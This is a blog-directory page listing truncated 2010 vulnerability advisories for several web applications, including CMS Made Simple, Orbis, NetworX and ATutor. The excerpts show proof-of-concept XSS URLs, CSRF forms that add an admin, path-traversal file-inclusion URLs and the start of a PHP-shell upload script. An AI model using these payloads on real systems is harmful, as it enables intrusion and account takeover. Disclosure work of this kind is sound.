Get Even More Visitors To Your Blog, Upgrade To A Business Listing >>
Idioma: En

Blog Directory  >  Software Blogs  >  Programming Blogs  >  XSS - Cross-Site Scripting programming Blog  > 

Xss - Cross-site Scripting Blog
cross-site-scripting.blogspot.com
And Other Web Related Deception

CMS Made Simple 1.8 Local File Inclusion

2010-07-12 01:12
A local file inclusion vulnerability in CMS Made Simple 1.8 can be exploited to include arbitrary files.PoCimport httplib, urllibhost = 'localhost'path = '/cmsms'lfi = '../' * 32 + 'windows/… Read More

Orbis 1.0.2 Authentication Bypass

2010-07-11 15:23
An authentication bypass vulnerability in Orbis 1.0.2 can be exploited to create a new admin.ExploitSeveral admin related scripts fail to terminate after setting the header location field.Po… Read More

Globber 1.4 Cross-site Request Forgery

2010-07-11 15:09
A cross-site request forgery vulnerability in Globber can be exploitedto add and delete blog posts.PoC<!-- Add (note that blog also must be "rebuilt") --><html> <body onloa… Read More

PeteWiki 0.6 Reflected XSS

2010-07-11 14:51
A reflected cross-site scripting vulnerability in PeteWiki 0.6 can be exploited to execute arbitrary JavaScript.PoChttp://localhost/petewiki/index.php?show=%3Cscript%3Ealert(0)%3C/script%3E Read More

NetworX 1.03 Arbitrary Upload

2010-07-05 16:40
An arbitrary upload vulnerability in NetworX 1.0.3 can be exploited to upload a PHP shell.PoCimport sys, sockethost = 'localhost'path = '/networx'port = 80def upload_shell(): s = socket.s… Read More

NuBuilder 10.04.20 Local File Inclusion

2010-07-05 16:39
A local file inclusion vulnerability in nuBuilder 10.04.20 can be exploited to include arbitrary files.PoChttp://localhost/nubuilder-10.04.20/productionnu2/fileuploader.php?dir=../../../../… Read More

ATutor 2.0 Cross-site Request Forgery

2010-07-05 16:37
A cross-site request forgery vulnerability in ATutor 2.0 can be exploited to create a new admin (new_admin/Password1).PoC<html> <body onload="document.forms[0].submit.click()"&gt&hell…Read More

NuBuilder 10.04.20 Reflected XSS

2010-07-05 16:37
An XSS vulnerability in nuBuilder 10.04.20 can be exploited toexecute arbitrary JavaScript.PoChttp://localhost/nubuilder-10.04.20/productionnu2/nuedit.php?f=%3Cscript%3Ealert(0)%3C/script%3E Read More

News Office 2.0.18 Reflected XSS

2010-07-05 16:36
An XSS vulnerability in News Office 2.0.18 can be exploited toexecute arbitrary JavaScript.PoChttp://localhost/newsoffice/news_show.php?n-user=a&n-cat='%3E%3Cscript%3Ealert(0)%3C/script%… Read More

Bit Weaver 2.7 Reflected XSS

2010-07-05 16:36
An XSS vulnerability in Bit Weaver 2.7 can be exploited toexecute arbitrary JavaScript.PoChttp://localhost/bitweaver/themes/preview_image.php?fImg=%22%3E%3Cscript%3Ealert(0)%3C/script%3E Read More

OdCMS 1.07 Reflected XSS

2010-07-05 16:35
An XSS vulnerability in odCMS 1.07 can be exploited toexecute arbitrary JavaScript.PoChttp://localhost/odcms/codes/archive.php?design=%3Cscript%3Ealert(0)%3C/script%3E Read More

NetworX 1.0.3 Reflected XSS

2010-07-05 16:35
An XSS vulnerability in NetworX 1.0.3 can be exploited toexecute arbitrary JavaScript.PoChttp://localhost/networx/group_connections_list_popup.php?group_id=%22%3E%3Cscript%3Ealert(0)%3C/scri… Read More

Orbis 1.0.2 Reflected XSS

2010-07-05 16:34
An XSS vulnerability in Orbis 1.0.2 can be exploited toexecute arbitrary JavaScript.PoChttp://localhost/orbis/admin/editors/text/editor-body.php?s=%22%3E%3Cscript%3Ealert(0)%3C/script%3E Read More

Share the post

XSS - Cross-Site Scripting

×

Subscribe to Xss - Cross-site Scripting

Get updates delivered right to your inbox!

Thank you for your subscription

×